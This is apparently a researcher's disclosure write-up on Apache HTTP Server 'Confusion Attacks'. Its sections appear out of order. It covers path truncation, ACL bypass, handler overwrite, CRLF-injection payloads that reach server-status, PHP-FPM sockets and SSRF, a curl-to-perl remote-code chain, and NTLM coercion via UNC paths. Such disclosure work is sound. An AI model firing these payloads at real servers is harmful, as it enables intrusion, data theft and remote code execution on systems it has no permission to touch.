The answer is — both can correctly get PHP running! Here are the two directive syntaxes, and you can see that not only are the usages similar, but even the effects are exactly the same. Why did Apache HTTP Server initially design two different directives doing the same thing?

AddHandler handler-name extension [extension] ...
AddType media-type extension [extension] ...

Actually, handler-name and media-type represent different fields within Httpd’s internal structure, corresponding to r->handler and r->content_type, respectively. The fact that users can use them interchangeably without realizing it is thanks to a piece of code that has been in Apache HTTP Server since its early development in 1996:

Path: server/config.c#L420

AP_CORE_DECLARE(int) ap_invoke_handler(request_rec *r) {

    // [...]

    if (!r->handler) {
        if (r->content_type) {
            handler = r->content_type;
            if ((p=ap_strchr_c(handler, ';')) != NULL) {
                char *new_handler = (char *)apr_pmemdup(r->pool, handler,
                                                        p - handler + 1);
                char *p2 = new_handler + (p - handler);
                handler = new_handler;

                /* exclude media type arguments */
                while (p2 > handler && p2[-1] == ' ')
                    --p2; /* strip trailing spaces */

                *p2='\0';
            }
        }
        else {
            handler = AP_DEFAULT_HANDLER_NAME;
        }

        r->handler = handler;
    }

    result = ap_run_handler(r);

You can see that before entering the ap_run_handler(), if r->handler is empty, the content of the r->content_type is used as the final module handler. This is also why AddType and AddHandler have the identical effect, because the media-type is eventually converted into the handler-name before handling. So, our third Handler Confusion is mainly developed around this behavior.
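
The fallback in the excerpt can be restated in Python as below. `DEFAULT_HANDLER` is a placeholder, since the value of `AP_DEFAULT_HANDLER_NAME` is not shown in the excerpt, and `effective_handler()` is a hypothetical name for this sketch.

```python
from typing import Optional

DEFAULT_HANDLER = "(default)"   # placeholder for AP_DEFAULT_HANDLER_NAME

def effective_handler(handler: Optional[str], content_type: Optional[str]) -> str:
    """Mirror the excerpt: an unset handler falls back to the content type."""
    if handler is not None:
        return handler
    if content_type is not None:
        # Drop media type arguments such as "; charset=..." and the
        # spaces in front of the ';'.
        return content_type.split(";", 1)[0].rstrip(" ")
    return DEFAULT_HANDLER

print(effective_handler(None, "application/x-httpd-php"))
print(effective_handler(None, "text/html; charset=iso-8859-1"))
print(effective_handler("cgi-script", "text/html"))
```

The first call shows why `AddType` alone is enough to run PHP: with no handler set, the media type is used as the handler name.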

⚔️ Primitive 3-1. Overwrite the Handler

By understanding this conversion mechanism, the first primitive is — Overwrite the Handler. Imagine if today the target Apache HTTP Server uses AddType to run PHP.

AddType application/x-httpd-php  .php

In the normal process, when accessing http://server/config.php, mod_mime copies the corresponding content type into r->content_type during the type_checker phase, based on the file extension set by AddType. Since r->handler is not assigned during the entire HTTP lifecycle, ap_invoke_handler() will treat r->content_type as the handler, ultimately calling mod_php to handle the request.

However, what happens if any module “accidentally” overwrites r->content_type before reaching ap_invoke_handler()?

✔️ 3-1-1. Overwrite Handler to Disclose PHP Source Code

The first exploitation of this primitive is to disclose arbitrary PHP source code through this “accidental overwrite”. This technique was first mentioned by Max Dmitriev in his research presented at ZeroNights 2021 (kudos to him!), and you can check his slides here:

Apache 0day bug, which still nobody knows of, and which was fixed accidentally

Max Dmitriev observed that by sending an incorrect Content-Length, the remote Httpd server would trigger an unexpected error and inadvertently return the source code of the PHP script. Upon investigating, he discovered that the issue was caused by ModSecurity not properly handling the AP_FILTER_ERROR return value while using the Apache Portable Runtime (APR) library, leading to a double response. When the error occurs, Httpd attempts to send an HTML error message, thereby accidentally overwriting r->content_type with text/html.

Because ModSecurity did not properly handle the return value, the internal HTTP lifecycle that should have stopped kept going. This “side effect” also overwrote the Content-Type that had originally been set, so files that should have been processed as PHP were treated as plain documents, exposing their source code and sensitive settings. 🤫

$ curl -v http://127.0.0.1/info.php -H "Content-Length: x"
> HTTP/1.1 400 Bad Request
> Date: Mon, 29 Jul 2024 05:32:23 GMT
> Server: Apache/2.4.41 (Ubuntu)
> Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
...
<?php phpinfo();?>
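
The overwrite can be modelled in a few lines of Python. This is a hedged sketch of the sequence described above, not a reproduction of the ModSecurity bug: the Request class and the functions type_checker(), send_error_page() and invoke_handler() are simplified stand-ins invented for this illustration.

```python
from dataclasses import dataclass
from typing import Optional

# Models "AddType application/x-httpd-php .php".
ADD_TYPE = {".php": "application/x-httpd-php"}


@dataclass
class Request:
    path: str
    handler: Optional[str] = None
    content_type: Optional[str] = None


def type_checker(req: Request) -> None:
    """Stand-in for mod_mime: set content_type from the file extension."""
    for ext, media_type in ADD_TYPE.items():
        if req.path.endswith(ext):
            req.content_type = media_type


def send_error_page(req: Request) -> None:
    """Stand-in for the error response that overwrites content_type."""
    req.content_type = "text/html; charset=iso-8859-1"


def invoke_handler(req: Request) -> str:
    """Legacy fallback: derive the handler from content_type if it is unset."""
    if req.handler is None and req.content_type is not None:
        head, sep, _ = req.content_type.partition(";")
        req.handler = head.rstrip(" ") if sep else req.content_type
    if req.handler == "application/x-httpd-php":
        return "executed by mod_php"
    return "served as a plain document"
```

Calling type_checker() and then invoke_handler() on /info.php models the normal path. Calling send_error_page() in between models the lifecycle that continues after the error, and the script falls through to the plain-document branch.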

In theory, all configurations based on Content-Type are vulnerable to this type of attack, so apart from the php-cgi paired with mod_actions shown in Max’s slides, pure mod_php coupled with AddType is also affected.

It’s worth mentioning that this side effect was corrected as a request parser bug in Apache HTTP Server 2.4.44, so this “vulnerability” was considered fixed until I picked it up again. However, since the root cause is still ModSecurity not handling errors properly, the same behavior can be reproduced if another code path that triggers AP_FILTER_ERROR is found.

P.S. This issue was reported to ModSecurity through the official security mail on 6/20, and the Project Co-Leader suggested returning to the original GitHub Issue for discussion.

✔️ 3-1-2. Overwrite Handler to ██████ ███████ ██████

Based on the double response behavior and its side effects mentioned earlier, this primitive could lead to other, even cooler exploitations. However, as this issue has not been fully fixed, further exploitation will be disclosed after it is fully resolved.

⚔️ Primitive 3-2. Invoke Arbitrary Handlers

Let’s think more carefully about the previous Overwrite Handler primitive. Although it is caused by ModSecurity not properly handling errors, which leaves the request with the wrong Content-Type, the deeper root cause is that Apache HTTP Server cannot distinguish the semantics of r->content_type when using it: the field can be set by a directive during the request phase, or it can be used as the Content-Type header of the server response.

Theoretically, if you can control the Content-Type header in the server response, you could invoke arbitrary module handlers through this legacy code snippet. This is the last primitive of Handler Confusion — invoking any internal module handler!

However, there’s still one last piece of the puzzle. In Httpd, all modifications to r->content_type from the server response occur after that legacy code. So, even if you can control the value of that field, at that point in the HTTP lifecycle, it’s too late to do further exploitation… is that right?

We turned to RFC 3875 for a rescue! RFC 3875 is a specification about CGI, and Section 6.2.2 defines a Local Redirect Response behavior:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

Simply put, the specification mandates that under certain conditions, CGI must use Server-Side resources to handle redirects. A close examination of mod_cgi’s implementation of this specification reveals:

Path: modules/generators/mod_cgi.c#L983

    if ((ret = ap_scan_script_header_err_brigade_ex(r, bb, sbuf,          // <------ [1]
                                                    APLOG_MODULE_INDEX)))
    {
        ret = log_script(r, conf, ret, dbuf, sbuf, bb, script_err);

        // [...]

        if (ret == HTTP_NOT_MODIFIED) {
            r->status = ret;
            return OK;
        }

        return ret;
    }

    location = apr_table_get(r->headers_out, "Location");

    if (location && r->status == 200) {
        // [...]
    }

    if (location && location[0] == '/' && r->status == 200) {          // <------ [2]
        /* This redirect needs to be a GET no matter what the original
         * method was.
         */
        r->method = "GET";
        r->method_number = M_GET;

        /* We already read the message body (if any), so don't allow
         * the redirected request to think it has one.  We can ignore
         * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
         */
        apr_table_unset(r->headers_in, "Content-Length");

        ap_internal_redirect_handler(location, r);                     // <------ [3]
        return OK;
    }

Initially, mod_cgi executes [1] the CGI script and scans its output to set the corresponding headers, such as Status and Content-Type. If [2] the returned Status is 200 and the Location header starts with a /, the response is treated as a Server-Side Redirection and is processed [3] internally. A closer look at the implementation of ap_internal_redirect_handler() shows:

Path: modules/http/http_request.c#L800

AP_DECLARE(void) ap_internal_redirect_handler(const char *new_uri, request_rec *r)
{
    int access_status;
    request_rec *new = internal_internal_redirect(new_uri, r);    // <------ [1]

    /* ap_die was already called, if an error occured */
    if (!new) {
        return;
    }

    if (r->handler)
        ap_set_content_type(new, r->content_type);                // <------ [2]
    access_status = ap_process_request_internal(new);             // <------ [3]
    if (access_status == OK) {
        access_status = ap_invoke_handler(new);                   // <------ [4]
    }
    ap_die(access_status, new);
}

Httpd first creates [1] a new request structure and copies [2] the current r->content_type into it. After processing [3] the lifecycle, it calls [4] ap_invoke_handler(), the place that contains the legacy transformation. So, in Server-Side Redirects, if you can control the response headers, you can invoke any module handler within Httpd. Basically, all CGI implementations in Apache HTTP Server follow this behavior, and here’s a simple list:

  • mod_cgi
  • mod_cgid
  • mod_wsgi
  • mod_uwsgi
  • mod_fastcgi
  • mod_perl
  • mod_asis
  • mod_fcgid
  • mod_proxy_scgi
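
The redirect flow described above can be sketched in Python as follows. This is a simplified model under stated assumptions: Request, is_local_redirect() and internal_redirect() are illustrative names, and the full request lifecycle that the real server runs for the new request is reduced to a comment.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Request:
    uri: str
    handler: Optional[str] = None
    content_type: Optional[str] = None


def is_local_redirect(status: int, location: Optional[str]) -> bool:
    """Mirror of check [2] in mod_cgi: status 200 and a Location starting with '/'."""
    return bool(location) and location.startswith("/") and status == 200


def internal_redirect(r: Request, new_uri: str) -> Request:
    """Model of ap_internal_redirect_handler(): content_type leaks into the new request."""
    new = Request(uri=new_uri)
    if r.handler:
        new.content_type = r.content_type   # attacker-influenced response header
    # (the real server processes the new request's lifecycle here)
    if new.handler is None and new.content_type is not None:
        head, sep, _ = new.content_type.partition(";")
        new.handler = head.rstrip(" ") if sep else new.content_type
    return new
```

If the CGI response carries Location: /ooo and Content-Type: server-status, the new request in this model ends up with server-status as its handler, even though nothing in the configuration maps /ooo to it.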

So how can this server-side redirect be triggered in real-world scenarios? Since you need control over at least the response’s Content-Type and part of the Location, here are two scenarios for reference:

  1. CRLF Injection in the CGI response headers, allowing overwriting of existing HTTP headers by new lines.
  2. SSRF that can completely control the response headers, such as a project hosted on mod_wsgi like django-revproxy.

The following examples are all based on this insecure CRLF Injection for the purpose of demonstration:

#!/usr/bin/perl 
 
use CGI;
my $q = CGI->new;
my $redir = $q->param("r");
if ($redir =~ m{^https?://}) {
    print "Location: $redir\n";
}
print "Content-Type: text/html\n\n";

✔️ 3-2-1. Arbitrary Handler to Information Disclosure

Starting with invoking an arbitrary handler to disclose information, we use the built-in server-status handler in Apache HTTP Server, which is typically only allowed to be accessed locally:

<Location /server-status>
    SetHandler server-status
    Require local
</Location>

With the ability to invoke any handler, it becomes possible to overwrite the Content-Type to access sensitive information that should not be accessible remotely:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a
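
To see why this payload works against the demo script, the sketch below rebuilds the request and replays what the vulnerable CGI would print. It is an approximation for illustration only: build_url(), cgi_sees(), vulnerable_cgi() and parse_headers() are hypothetical helpers, the header parsing is deliberately naive (last value wins), and the spaces shown in the payload above are omitted.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit


def build_url(base: str, location: str, content_type: str) -> str:
    """Build the CRLF-injection URL for the demo redir.cgi script."""
    injected = ("http://\r\n"
                f"Location:{location}\r\n"
                f"Content-Type:{content_type}\r\n\r\n")
    return base + "?r=" + quote(injected, safe="")


def cgi_sees(url: str) -> str:
    """The decoded value of the 'r' parameter as the CGI script receives it."""
    return parse_qs(urlsplit(url).query)["r"][0]


def vulnerable_cgi(redir: str) -> str:
    """Python rendition of the Perl demo script above."""
    out = ""
    if re.match(r"^https?://", redir):
        out += f"Location: {redir}\n"
    return out + "Content-Type: text/html\n\n"


def parse_headers(raw: str) -> dict:
    """Naive header scan: stop at the first blank line, last value wins."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n"):
        if line == "":
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers
```

The injected blank line ends the header block early, so the script’s own Content-Type: text/html line is pushed into the body and the attacker’s values are the ones that get scanned.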

✔️ 3-2-2. Arbitrary Handler to Misinterpret Scripts

It’s also easy to transform an image with a legitimate extension into a PHP backdoor. For instance, this primitive allows specifying mod_php to execute embedded malicious code within the image, like:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a

✔️ 3-2-3. Arbitrary Handler to Full SSRF

Calling mod_proxy to access any protocol on any URL is, of course, straightforward:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3F %0d%0a
%0d%0a

Moreover, this is a full-control SSRF: you can control all request headers and read the entire HTTP response! One slight disappointment is that mod_proxy automatically adds an X-Forwarded-For header, which is blocked by the metadata protection mechanisms of EC2 and GCP when accessing Cloud Metadata. Otherwise, this would be an even more powerful primitive.

✔️ 3-2-4. Arbitrary Handler to Access Local Unix Domain Socket

However, mod_proxy offers a more “convenient” feature: it can access local Unix Domain Sockets! 😉

Here’s a demonstration accessing PHP-FPM’s local Unix Domain Socket to execute a PHP backdoor located in /tmp/:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

Theoretically, this technique has even more potential, such as protocol smuggling (smuggling FastCGI in HTTP/HTTPS protocols 😏) or exploiting other vulnerable local sockets. These possibilities are left for interested readers to explore.

✔️ 3-2-5. Arbitrary Handler to RCE

Finally, let’s demonstrate how to transform this primitive into an RCE using a common CTF trick! Since the official PHP Docker image includes PEAR, a command-line PHP package management tool, its pearcmd.php can serve as an entry point for further exploitation. For details, see the article Docker PHP LFI Summary, written by Phith0n!

Here we utilize a Command Injection within run-tests to complete the entire exploit chain, detailed as follows:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

It’s common to see CRLF Injection or Header Injection being reported as XSS in Security Advisories or Bug Bounties. While it is true that these can sometimes chain to impactful vulnerabilities like Account Takeover through SSO, please don’t forget that they can also lead to Server-Side RCE, as this demonstration proves its potential!

🔥 4. Other Vulnerabilities

While this essentially covers the Confusion Attacks, some minor vulnerabilities discovered during our research of Apache HTTP Server are worth mentioning separately.

⚔️ CVE-2024-38472 - Windows UNC-based SSRF

Firstly, the Windows implementation of the apr_filepath_merge() function allows the use of UNC paths, which allows attackers to coerce NTLM authentication to any host. Here we list two different triggering paths:

✔️ Triggered via HTTP Request Parser

Direct triggering through an HTTP request parser in Httpd requires additional configuration, which might seem impractical at first glance but often appears with Tomcat (mod_jk, mod_proxy_ajp) or pairing with PATH_INFO:

AllowEncodedSlashes On

Additionally, since Httpd rewrote its core HTTP request parser logic after 2.4.49, triggering the vulnerability in later versions requires an additional configuration:

AllowEncodedSlashes On
MergeSlashes Off

Using two %5C can force Httpd to coerce NTLM authentication to an attacker-controlled server, and in practice this SSRF can be converted into RCE through NTLM Relay!

$ curl http://server/%5C%5Cattacker-server/path/to

✔️ Triggered via Type-Map

In the Debian/Ubuntu distribution of Httpd, Type-Map is enabled by default:

AddHandler type-map var

By uploading a .var file to the server and setting the URI field to a UNC path, you can also force the server to coerce NTLM authentication to the attacker. This is also the second .var trick I proposed. 😉

⚔️ CVE-2024-39573 - SSRF via Full Control of RewriteRule Prefix

Lastly, when you have full control over the prefix of a RewriteRule substitution target in Server Config or VirtualHost, you can invoke mod_proxy and its sub-modules:

RewriteRule ^/broken(.*) $1

Using the following URL can delegate the request to mod_proxy for processing:

$ curl http://server/brokenproxy:unix:/run/[...]|http://path/to
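
Why this URL reaches mod_proxy is easier to see when the rule is applied by hand. The Python sketch below is a rough model of a single-capture RewriteRule, not mod_rewrite itself; apply_rule() is an illustrative helper, and /run/example.sock is a made-up placeholder for the path elided in the request above.

```python
import re
from typing import Optional


def apply_rule(pattern: str, substitution: str, path: str) -> Optional[str]:
    """Apply a one-capture rule: replace $1 in the substitution with the match."""
    match = re.match(pattern, path)
    if match is None:
        return None
    return substitution.replace("$1", match.group(1))


# Hypothetical socket path standing in for the elided "/run/[...]".
rewritten = apply_rule(r"^/broken(.*)",
                       "$1",
                       "/brokenproxy:unix:/run/example.sock|http://path/to")
```

Because the substitution is nothing but $1, the whole result is attacker-controlled and starts with proxy:, which is the prefix that hands the request over to mod_proxy.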

But if administrators tested such a rule properly, they would realize that it is impractical. It was therefore originally reported together with another vulnerability as an exploit chain, but the security team also treated this behavior as a security boundary fix. After the patches came out, other researchers applied the same behavior to Windows UNC paths and obtained an additional CVE.

Future Works

Finally, let’s talk about future work and areas for improvement in this research. Confusion Attacks are still a very promising attack surface, especially since my research focused mainly on just two fields. Unless the Apache HTTP Server undergoes architectural improvements or provides better development standards, I believe we’ll see more “confusions” in the future!

So, what other areas could be enhanced? In reality, different Httpd distributions have different configurations, so other Unix-Like systems such as the RHEL series, BSD family, and even applications that utilize Httpd might have more escapable RewriteRule, more powerful local gadgets, and unexpected symbolic jumps. These are all left for those interested to continue exploring.

Due to time constraints, I was unable to share more real-world cases found and exploited in actual websites, devices, or even open-source projects. However, you can probably imagine — the real world is still full of countless unexplored rules, bypassable authentications, and hidden CGIs waiting to be uncovered. How to hunt these techniques worldwide? That’s your mission!

Conclusion

Maintaining an open-source project is truly challenging, especially when trying to balance user convenience with the compatibility of older versions. A slight oversight can lead to the entire system being compromised, such as what happened with Httpd 2.4.49, where a minor change in path processing logic led to the disastrous CVE-2021-41773. The entire development process must be carefully built upon a pile of legacy code and technical debt. So, if any Apache HTTP Server developers are reading this: Thank you for your hard work and contributions!

[中文] Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!


Orange Tsai (@orange_8361)  |  繁體中文版本  |  English Version

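Hey there! This is my research on Apache HTTP Server, presented this year at Black Hat USA 2024. This research will also be presented at HITCON and OrangeCon. If you’re interested in a preview, you can get the slides here:

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

Also, I would like to thank Akamai for their friendly outreach! They released mitigation measures immediately after this research was published (details can be found on Akamai’s blog).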

TL;DR

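This article explores architectural issues within the Apache HTTP Server and introduces several pieces of architectural debt in Httpd, including 3 types of Confusion Attacks, 9 new vulnerabilities, 20 exploitation techniques, and over 30 case studies. The content includes, but is not limited to:

  1. How a single ? can bypass Httpd’s built-in access control and authentication.
  2. How unsafe RewriteRules can escape the Web Root and access the entire filesystem.
  3. How to leverage a piece of code left over from 1996 to transform an XSS into RCE.

Outline

Before the Story

This section is purely some personal murmurs. If you’re only interested in the technical details, jump straight to: How Did the Story Begin?

As a researcher, perhaps the greatest joy is seeing your work noticed and understood by peers. So after completing a piece of work with fruitful results, it is natural to want the world to see it, which is why I have presented multiple times at Black Hat USA and DEFCON. As you may know, since 2022 I have been unable to obtain a valid visa to enter the U.S. (for Taiwan, which is part of the Visa Waiver Program, travel authorization can typically be obtained online within minutes to hours), which made me miss the in-person talk at Black Hat USA 2022. Even my solo trip to Peru and Easter Island in 2023 could not transit through the U.S. :(

To resolve this situation, I started preparing for a B1/B2 visa in January this year: writing various documents, interviewing at the embassy, and waiting endlessly. It was not fun, but to get my work seen, I still spent a great deal of time running around for the visa and seeking every possibility. Even three weeks before the conference, it was still unclear whether my talk would be cancelled (BH initially accepted only in-person talks, but thanks to the review board’s recognition of this research, it could finally be presented in a pre-recorded format). So everything you see, including the slides, the video, and this blog post, was completed within just a few dozen days. 😖

I am just a simple researcher with a clear conscience, and my attitude towards vulnerabilities has always been that they should be reported to and fixed by the vendor. I am not writing these words for any particular reason; I simply want to record some feelings of helplessness, the efforts I made this year, and to thank those who helped me along the way. Thank you all :)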

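How Did the Story Begin?

Around the beginning of this year, I started thinking about my next research target. As you might know, I always want to challenge big targets that affect the entire internet, so I began looking for complex-looking topics or interesting open-source projects such as Nginx and PHP, and even started reading RFCs to strengthen my understanding of protocol implementation details.

Although most attempts ended in failure (though some might become the topic of a future blog post 😉), while carefully going through this code I recalled that I had briefly looked at the Apache HTTP Server source code in the middle of last year! Even though I did not read the code in depth because of my work schedule, I could already “smell” something not quite right in its coding style back then.

So this year I decided to continue, turning “why does it smell weird?” from an indescribable “feeling” into something concrete, and dive deep into Apache HTTP Server!

Why Does Apache HTTP Server Smell Bad?

First of all, Apache HTTP Server is a world built from “modules”, and its official documentation proudly declares its modularity (MPMs - Multi-Processing Modules):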

Apache httpd has always accommodated a wide variety of environments through its modular design. […] Apache HTTP Server 2.0 extends this modular design to the most basic functions of a web server.

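The entire Httpd service relies on hundreds of small modules working together to handle a client’s HTTP request. Of the 136 modules listed in the official documentation, roughly half are enabled by default or frequently used.

What’s even more surprising is that, while handling client HTTP requests, all these modules also jointly maintain a colossal request_rec structure. This structure includes everything needed to process HTTP, and its detailed definition can be found in include/httpd.h. All modules depend on this massive structure for synchronization, communication, and even data exchange. The structure is passed between all the modules like a ball being tossed around, and every module can modify any value in it as it pleases!

From a software engineering perspective, this kind of collaboration is nothing new. Each individual only needs to focus on its own job; as long as everyone finishes their work properly, the client can enjoy the service Httpd provides. This division of labor may work fine among a handful of modules, but what happens when we scale it up to hundreds of modules working together? Can they really cooperate well? 🤔

So our starting point is simple: the modules do not fully understand each other’s implementation details, yet they are required to cooperate. Each module may be implemented by a different developer, and the code has gone through years of iteration, refactoring, and modification. Do they still really know what they are doing? Even if they know themselves inside out, what about the other modules? Without a good development standard or usage guideline, there must be many small gaps in between that we can exploit!

The New Attack Surface: Confusion Attacks

Based on these observations, we started focusing on the “relationships” and “interactions” among these modules. If a module accidentally modifies a structure field that it considers unimportant but that is crucial to another module, it could affect that module’s decisions. Going further, if Apache HTTP Server’s definitions of these fields are not precise enough, so that different modules have fundamentally inconsistent understandings of the same field, that could lead to security risks as well!

From this starting point, we developed three different types of attacks. Since these attacks are all more or less related to modules misusing structure fields, we named this attack surface “Confusion Attack”. The attacks we developed are: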

  1. Filename Confusion
  2. DocumentRoot Confusion
  3. Handler Confusion

Through these attacks, we found 9 different vulnerabilities:

  1. CVE-2024-38472 - Apache HTTP Server on Windows UNC SSRF
  2. CVE-2024-39573 - Apache HTTP Server proxy encoding problem
  3. CVE-2024-38477 - Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
  4. CVE-2024-38476 - Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
  5. CVE-2024-38475 - Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
  6. CVE-2024-38474 - Apache HTTP Server weakness with encoded question marks in backreferences
  7. CVE-2024-38473 - Apache HTTP Server proxy encoding problem
  8. CVE-2023-38709 - Apache HTTP Server: HTTP response splitting
  9. CVE-2024-?????? - [redacted]

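All of these vulnerabilities were reported through the official security mailing list, and the Apache HTTP Server team released a security advisory and the 2.4.60 update on 2024-07-01 (see the official announcement for details).

Because this is a new attack surface arising from the architecture and internal mechanisms of Httpd, naturally the first person to dig into it can find the most vulnerabilities, so I am currently the person holding the most CVEs for Apache HTTP Server 😉. It also means that many of the fixes cannot be backward compatible because of the historical architecture. For many long-running production servers, patching is therefore not an easy task; if administrators update without careful consideration, they may break many existing configurations and cause service downtime. 😨

Now, let’s start introducing the attacks we developed!

🔥 1. Filename Confusion

The first one is the Confusion based on the Filename field. Literally, r->filename should be a filesystem path. In Httpd, however, some modules treat it as a URL. If, within the context of an HTTP request, some modules treat r->filename as a file path while others treat it as a URL, this inconsistency can lead to security issues!

⚔️ Primitive 1-1. Truncation

So which modules treat r->filename as a URL? The first is mod_rewrite, which lets administrators easily rewrite a path according to specified rules using the RewriteRule directive: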

RewriteRule Pattern Substitution [flags]

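The substitution target can be either a filesystem path or a URL. This is probably a convenience made for user experience, but this “convenience” also introduces risks. For instance, when rewriting the path, mod_rewrite forcibly treats the result as a URL (splitout_queryargs()), which means that in an HTTP request a question mark %3F can truncate the path or URL that follows in the RewriteRule. This leads to the following two attack techniques.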

Path: modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */
static int apply_rewrite_rule(rewriterule_entry *p, rewrite_ctx *ctx)
{
    ap_regmatch_t regmatch[AP_MAX_REG_MATCH];
    apr_array_header_t *rewriteconds;
    rewritecond_entry *conds;
    
    // [...]
    
    for (i = 0; i < rewriteconds->nelts; ++i) {
        rewritecond_entry *c = &conds[i];
        rc = apply_rewrite_cond(c, ctx);
        
        // [...] do the remaining stuff
        
    }
    
    /* Now adjust API's knowledge about r->filename and r->args */
    r->filename = newuri;

    if (ctx->perdir && (p->flags & RULEFLAG_DISCARDPATHINFO)) {
        r->path_info = NULL;
    }

    splitout_queryargs(r, p->flags);         // <------- [!!!] Truncate the `r->filename`
    
    // [...]
}

✔️ 1-1-1. Path Truncation

The first technique is truncation of a filesystem path. Imagine the following RewriteRule:

RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

The server opens the corresponding profile based on the username that follows /user/ in the URL path, for example:

$ curl http://server/user/orange
 # the output of file `/var/user/orange/profile.yml`

Since mod_rewrite forcibly treats the rewritten result as a URL, even though the target is a filesystem path, a question mark can truncate the trailing /profile.yml, for example:

$ curl http://server/user/orange%2Fsecret.yml%3F
 # the output of file `/var/user/orange/secret.yml`
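
The truncation can be reproduced with a small Python model. This is a sketch under simplifying assumptions rather than mod_rewrite’s real algorithm: apply_rewrite_rule() is an illustrative name, the request path is percent-decoded up front, and only the $N backreferences and the split at the first ? are modelled.

```python
import re
from typing import Optional, Tuple
from urllib.parse import unquote


def apply_rewrite_rule(pattern: str, substitution: str,
                       request_path: str) -> Optional[Tuple[str, str]]:
    """Return (filename, args) after a rewrite, splitting at the first '?'."""
    uri = unquote(request_path)                 # %2F -> '/', %3F -> '?'
    match = re.search(pattern, uri)
    if match is None:
        return None
    rewritten = substitution
    for index, group in enumerate(match.groups(), start=1):
        rewritten = rewritten.replace(f"${index}", group or "")
    # Model of splitout_queryargs(): everything after '?' becomes the query string.
    filename, _, args = rewritten.partition("?")
    return filename, args
```

For /user/orange the model yields /var/user/orange/profile.yml, while /user/orange%2Fsecret.yml%3F yields /var/user/orange/secret.yml, with the unwanted /profile.yml suffix pushed into the query string.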

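This is our first technique: Path Truncation. Let’s pause the exploration of this technique here for now. Although it looks like only a small flaw at the moment, keep it in mind, because it will reappear again and again in later attacks, gradually tearing open this seemingly harmless little breach! 😜

✔️ 1-1-2. Mislead RewriteFlag Assignment

The second use of the truncation technique is to mislead the assignment of RewriteFlags. Imagine an administrator who manages the site’s paths and their corresponding modules through the following RewriteRule: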

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

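If a request ends with the .php extension, the handler for mod_php is added (it could also be an environment variable or a Content-Type; see the official RewriteRule Flags manual for details on the flags).

Since mod_rewrite’s truncation happens after the regular expression match, an attacker can use the original rule and a ? to apply RewriteFlags to requests they should not apply to. For example, upload a GIF image carrying malicious PHP code and have it executed as a backdoor through a crafted request: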

$ curl http://server/upload/1.gif
 # GIF89a <?=`id`;?>

$ curl http://server/upload/1.gif%3fooo.php
 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)

⚔️ Primitive 1-2. ACL Bypass

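The second technique of Filename Confusion occurs in mod_proxy. While the previous attack unconditionally treated the target as a URL, this time the authentication and access control bypass is caused by modules understanding r->filename inconsistently.

It actually makes sense for mod_proxy to treat r->filename as a URL, since the purpose of a proxy is to “redirect” requests to other URLs. But security is often like this: each component is fine on its own, yet problems appear when they are combined! This is especially true when most modules treat r->filename as a filesystem path by default. Suppose you use a filesystem-based access control module while mod_proxy treats r->filename as a URL. This inconsistency can lead to the bypass of access control or authentication!

A classic example is an administrator using the Files directive to restrict a single file, such as admin.php: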

<Files "admin.php">
    AuthType Basic 
    AuthName "Admin Panel"
    AuthUserFile "/etc/apache2/.htpasswd"
    Require valid-user
</Files>

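In a default PHP-FPM installation, this kind of configuration can be bypassed directly! By the way, this is also the most common way of doing authentication in Apache HTTP Server! Suppose you visit a URL like this:

http://server/admin.php%3Fooo.php

In the HTTP lifecycle of this URL, the authentication module first compares the requested filename with the protected file. At this point the r->filename field is admin.php?ooo.php, which obviously does not match admin.php, so the module assumes the current request requires no authentication. However, the PHP-FPM configuration is set to hand requests ending in .php over to mod_proxy using the SetHandler directive: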

Path: /etc/apache2/mods-enabled/php8.2-fpm.conf

# Using (?:pattern) instead of (pattern) is a small optimization that
# avoid capturing the matching pattern (as $1) which isn't used here
<FilesMatch ".+\.ph(?:ar|p|tml)$">
    SetHandler "proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"
</FilesMatch>

mod_proxy rewrites r->filename into the following URL and, based on its scheme, calls the sub-module mod_proxy_fcgi to handle the subsequent FastCGI protocol logic:

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

Since the backend receives the filename in a strange format, PHP-FPM has to handle this behavior specially. The logic is as follows:

Path: sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"

if (env_script_filename &&
    strncasecmp(env_script_filename, APACHE_PROXY_FCGI_PREFIX, sizeof(APACHE_PROXY_FCGI_PREFIX) - 1) == 0) {
    /* advance to first character of hostname */
    char *p = env_script_filename + (sizeof(APACHE_PROXY_FCGI_PREFIX) - 1);
    while (*p != '\0' && *p != '/') {
        p++;    /* move past hostname and port */
    }
